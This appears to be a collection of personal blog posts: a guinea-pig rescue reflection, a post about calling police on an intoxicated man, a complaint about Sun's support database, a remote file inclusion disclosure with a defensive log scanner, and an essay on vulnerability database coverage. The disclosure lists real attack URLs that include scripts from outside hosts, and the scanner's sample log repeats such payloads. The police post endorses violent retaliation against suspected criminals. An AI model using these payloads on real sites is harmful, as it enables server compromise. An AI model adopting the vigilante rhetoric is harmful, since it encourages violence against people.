Reflection on Rescue

i own guinea pigs. seven of them now, mostly rescues. they come from all types of places, but mostly from places where they were in bad shape or had no future. a year ago i barely knew anything about them but Kay got me into them. before long i had one. two. three. four. five. six. seven. just that fast it seems. went from a single large cage to a six foot tall custom C&C cage that takes up a fourth of the living room. for some reason, i am perfectly ok with that. for the most part they are simple and dumb creatures that can no longer survive on their own. they have been domesticated as long as, if not longer than, cats. they now take a considerable amount of time each day, preparing vegetables twice a day, spot cleaning the cage, filling water, giving them food, providing hay and interacting with them. on most days they get out of the cage into a play pen on the floor and get to run around. being simple creatures, changing up the play pen or their cage by re-arranging stuff or introducing new items to either does wonders to stimulate them. they are touch-me-not creatures, hate to be held, and show no signs of affection toward each other, let alone me. despite that, i love them dearly and believe deep down that by rescuing and caring for them, i am righting a speck of wrong-doing on the part of humanity and our history for obstructing nature. the least i can do is to provide them the absolute best life possible. if it means my living room is always a mess or that i skip a few nice meals so i can buy them the veggies they need and want, so be it. simple creatures or not, they would not be in the general predicament had it not been for meddling humans.

it’s hard being here all day every day near them. while i love watching them and talking to them, i am present for every cough or odd noise they make. every troubled wheek, every sign of discomfort, i hear it. a few of them are older pigs and are likely not going to be here a year from now. even Waffle who was adopted early on has an ongoing problem with congestion (for lack of better words). she gets over it quick but in a guinea pig, that type of respiratory distress can be fatal. i dread the day when one of them decides to move on. until then, they deserve to be happy.

at some point recently, Kay asked me what animal ever benefited from our domesticating them. i thought long and hard and the only time i could come up with an answer was directly due to my ignorance of the animal and their history. the more i thought about it the more i realized that question was a great fundamental eye opener to anyone who was under some impression that animals were better off as pets. if given the choice, i don’t think i would change anything about the pets i have or will have. the only difference is that now, i completely and fully understand that it is entirely selfish, not because the animal benefits from it. hell, we feed our cats a diet of carbohydrate rich pellets that are about as far from their natural diet as you can possibly get. yes, the cats live a long time on that diet, but they aren’t necessarily happy or healthier as a result. the proper diet consists of food from boutique pet stores and fetches prices that most people can’t afford, so we fall back on really horrible foods that turn cats into slugs.

Stand Your Ground

The night started with a loud voice from outside, echoing between the buildings. Couldn’t see anyone from any window but it was definitely very close. Since it couldn’t be from the balcony or parking lot, and wasn’t the courtyard in the next building or mine, it had to be someone between the buildings but near the alley. I went out the front door and looked over the edge and saw someone. He was loud, sounded intoxicated or under the influence. He mentioned crack cocaine in his ramblings so I called non-emergency police. Yes, someone who used to do bad things and avoid cops like the plague is the one calling them these days. That ‘neighborhood watch’ sign warns you about me in these parts. If you are going to do bad things, don’t be so fucking obvious please.

Last time it was a drunk shouting at the top of his lungs in the parking lot. I called non-emergency and Denver District 6 rolled up in under 2 minutes, questioned him, ran his info and arrested him (warrants I assume). Tonight, DD6 rolled up in about two minutes, the officer approached the perp and told him to be cool, saw me up above on courtyard level and asked me where the 2nd guy was. I told him if there wasn’t a 2nd, he had been talking to himself all night.

I feel bad because for the most part, he wasn’t doing harm. He was loud, he was on private property
and he was talking about illegal activity. Any one of those things wouldn’t have been bad, but after hours of that, why should the tenants suffer? When the officer walked up, the perp was immediately worried and scared of going to jail. Even with the officer talking to me a floor above, the perp didn’t seem to realize I was there or why the officer showed up. When I realized he had been talking to himself and not someone that was out of sight, all I could think of was how the system has failed. Without getting into some huge political rant, why do we spend billions on overseas aid packages and wars when we have so many problems at home? I would have rather gone down there and given him a warm meal and an old shirt rather than call the police, but the state of society just makes that too risky. It’s really sad.

While the officer searched him and secured him, I started to back away so that the perp couldn’t see me. I realized quickly, “wtf”. I live here, this is my home. Why should I be afraid of him or anyone else that doesn’t belong. I know good people get hurt by bad people for just that sort of thing, but the principle is sound. The good guys shouldn’t have to hide, they shouldn’t have to run. I stepped forward against the gate and answered the officer’s questions loudly, daring the perp to look up at me. I know the law doesn’t favor my position, but if someone commits a crime on or near my property and I report it, if they come back for any form of retaliation it should really be open season on shitheads. Not only should I be able to defend myself, but the fact that if they came back to attempt to intimidate or hurt a good citizen should give me license to put my boot on their throat or drill them with a legally owned and licensed gun.

I know, too many douche bags that don’t have the ability to rationalize and get through that process without serious bias, that turns them into would-be vigilantes that ultimately kill their neighbor on accident or find a random perp miles from home to unload on. But like the one-off dangerous misdemeanor criminal that might come back on a witness, the over-zealous vigilante is similarly the one-off. Until that changes, the good guy can only stand up for their home and their rights.

Dr. Jekyll and Mr. Hide (Sun & Disclosure)

[This was originally published on the OSVDB blog.]

Today just happened to be the right day where I saw the Jekyll and “Hide” of Sun though. A few days ago, |)ruid posted about a Solaris ypupdated vulnerability in which he says it corresponds to CVE-1999-0208 / OSVDB 11517. Given the original vulnerability was published in 1994, I had doubts it was truly the same vulnerability. I replied asking for confirmation, |)ruid replied and CC’d the Sun Security Coordination Team. Within 24 hours, Sun replied with a detailed analysis explaining how 11517 was different from the newly created OSVDB 43433, but very much related. This mail is a VDB maintainer’s wet dream; if only every vendor would provide this kind of detail when there is confusion over published vulnerability information. This is clearly the Dr. Jekyll locked up in a Sun complex somewhere who deserves kudos for the reply.

The Sun Microsystems “SunSolve” database is a quagmire of technical muck that is only rivaled by the IBM APAR database I believe. Tonight I find myself plowing through a grotesque changelog of Sun Java System Directory Server (SJSDS?). Sun apparently hasn’t fully mastered the idea of hyperlinking to make those annoying numbers on the left lead to somewhere with more information. So I log into the SunSolve database using my super secret ID associated with a sizable company that owns lots of Sun products. I type in a few numbers of interest off that list and away I … don’t go. Mr. Hide stops me quick, telling me that to read the bug IDs I have to be a better customer apparently.

You have selected content which is only available to registered SunSolve users with a valid Sun Service Plan. Please Login to access the restricted content of SunSolve and the Sun System Handbook if you are logged in to SunSolve and have received this message, please verify that you are associated with a valid support contract in the iSupport tool. If you have any questions about your support contract, please follow up with the Sun contract administrator contact at your company. If, however, none of the previous conditions apply, you may be trying to access a document that is no longer available. In this case please feel free to click on the SunSolve Feedback link at the bottom of the page and be sure to include the exact steps you took before you received this error message.

Wow, way to foil me via security through obscurity Sun Microsystems. Please take Mr. Hide and shove my beer bottle up his ass, sideways. Booze is the only way to adequately cope with the kind of headache born from vendors who can’t manage, organize, and share information.

Disclosure: Multiple Software Remote File Inclusion

[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]

Quick searches didn’t find these in OSVDB. I haven’t had time to check the other VDBs.

/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn

/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??

/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f

/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f

/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??

/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??

/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???
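The attempts above were spotted by reading Apache logs by hand. As an added example (not part of the original post or of attrition.org's tooling), the following script automates that triage: it parses Apache combined-format log lines, URL-decodes each query parameter, and flags any parameter whose value is an absolute remote URL, which is the signature of an RFI probe. The log lines and the `attacker.example` host are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format: the request line is the quoted "METHOD TARGET PROTO" field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# RFI payloads point include paths at a remote host; the trailing "??" or "%3f%3f"
# seen in the wild is there to turn whatever the script appends into a query string.
REMOTE_URL = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def find_rfi_params(target):
    """Return (param, decoded_value) pairs whose value is an absolute remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)          # second pass catches double-encoded payloads
        if REMOTE_URL.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Walk log lines and collect one finding per remote-URL parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip malformed or non-combined lines
        target = m.group("target")
        for name, url in find_rfi_params(target):
            findings.append({"ip": m.group("ip"), "script": urlsplit(target).path,
                             "param": name, "url": url, "status": int(m.group("status"))})
    return findings


# Constructed sample: two probes against scripts named above, plus one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2008:02:14:07 -0700] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://attacker.example/vn HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [10/Mar/2008:02:14:09 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://attacker.example/test.txt%3f%3f%3f HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Mar/2008:02:15:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} {f['script']} {f['param']} -> {f['url']} (HTTP {f['status']})")
```

A 200 on a flagged request is the one worth checking first: it means the script exists and may have fetched the remote file.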

Vulnerability Counts and OSVDB Advocacy

[This was originally published on the OSVDB blog.]

CVE just announced reaching 30,000 identifiers which is a pretty scary thing. CVE staff have a good eye for catching vulnerabilities from sources away from the mainstream (e.g. bugtraq) and they have the advantage of being a very widely accepted standard for tracking vulnerabilities. As companies and researchers request CVE numbers for disclosures, they get a lot of the information handed to them on a silver platter. Of course, sometimes that platter is full of mud and confusion as vendors don’t always provide clear details to help CVE accurately track and distinguish between multiple vulnerabilities. I’ve also pointed out many times in the past that CVE is a very unique VDB that provides identifiers for vulnerability tracking. They do not provide many fields associated with other VDBs (solution, creditee, etc). As such, they may have a single entry that covers multiple distinct vulnerabilities if they are the same class (XSS, SQLi, RFI), or if there is a lack of details but they know it affects the same product (Oracle). So when we see 30,000 identifiers, we have to realize that the real count of vulnerabilities is significantly higher.

CVE is run by The MITRE Corporation, sponsored / funded by the NCSD (US-CERT) of DHS under government contract. That means our tax dollars fund this database so it should be of particular interest to U.S. taxpayers in the security industry. I know from past discussions with CVE staff and other industry veterans that on any given day, they are more likely to have more work than available staff. That means the rate of vulnerabilities that get published is greater than the resources CVE can maintain to track them. In short, the 30,000 identifiers you see only represent a percentage of the vulnerabilities actually disclosed. We could probably debate what percentage that represents all day long, and I don’t think that is really the point here other than “we know it isn’t all of them”.

Every VDB suffers from the same thing. “Commercial” VDBs like X-Force, BID and Secunia have a full time staff that maintain their databases, like CVE does. Despite having all of these teams (some of them consisting of 10 or more people) maintain VDBs, we still see countless vulnerabilities that are ‘missed’ by all of them. This is not a slight against them in any way; it is a simple matter of resources available and the amount of information out there. Even with a large team sorting disclosed vulnerabilities, some teams spend time validating the findings before adding them to the database (Secunia), which is an incredible benefit for their customers. There is also a long standing parasitic nature to VDBs, with each of them watching the others as best they can, to help ensure they are tracking all the vulnerabilities they can. For example, OSVDB keeps a close eye on Secunia and CVE specifically, and as time permits we look to X-Force, BID, SecurityTracker and others. Each VDB tends to have some researchers that exclusively disclose vulnerabilities directly to the VDB of their choice. So each one I mention above will get word of vulnerabilities that the rest really have no way of knowing about short of watching each other like this. This VDB inbreeding (I will explain the choice of word some other time) is an accepted practice and I have touched on this in the past (CanSecWest 2005).

Due to the inbreeding and OSVDB’s ability to watch other resources, it occasionally frees up our moderators to go looking for more vulnerability information that wasn’t published in the mainstream. This usually involves grueling crawls through vendor knowledge-bases, mind-numbing changelogs, searching CVS type repositories and more. That leads to the point of this lengthy post. In doing this research, we begin to see how many more vulnerabilities are out there in the software we use that escape the VDBs most of the time. Only now, after four years and getting an incredible developer to make many aspects of the OSVDB wish-list a reality, do we finally begin to see all of this. As I have whined about for those four years, VDBs need to evolve and move beyond this purely “mainstream reactionary” model. Meaning, we have to stop watching the half dozen usual spots for new vulnerability information, creating our entries, rinsing and repeating. There is a lot more information out there just waiting to be read and added.

In the past few weeks, largely due to the ability to free up time due to the VDB inbreeding mentioned above, we’ve been able to dig into a few products more thoroughly. These examples are not meant to pick on any product / VDB or imply anything other than what is said above. In fact, this type of research is only possible because the other VDBs are doing a good job tracking the mainstream sources, and because some vendors publish full changelogs and don’t try to hide security related fixes. Kudos to all of them.

Example: Search your favorite VDB for ”inspircd”, a popular multi-platform IRC daemon. Compare the results of BID, Secunia, ISS X-Force, SecurityTracker, and OSVDB:

Compare these results to OSVDB after digging into their changelogs.

Do these same searches for “xfce” (10 OSVDB, 5 max elsewhere), “safesquid” (6 OSVDB, 1 max elsewhere), “beehive forum” (27 OSVDB, 8 max elsewhere) and “jetty” (25 OSVDB, 12 max elsewhere). Let me emphasize, I did not specifically hand pick these examples to put down any VDB, these are some of the products we’ve investigated in the last few weeks.

The real point here is that no matter what vulnerability disclosure statistic you read, regardless of which VDB it uses (including OSVDB), consider that the real number of vulnerabilities disclosed is likely much higher than any of us know or have documented. As always, if you see vulnerabilities in a vendor KB or changelog, and can’t find them in your favorite VDB, let them know. We all maintain e-mail addresses for submissions and we all strive to be as complete as possible.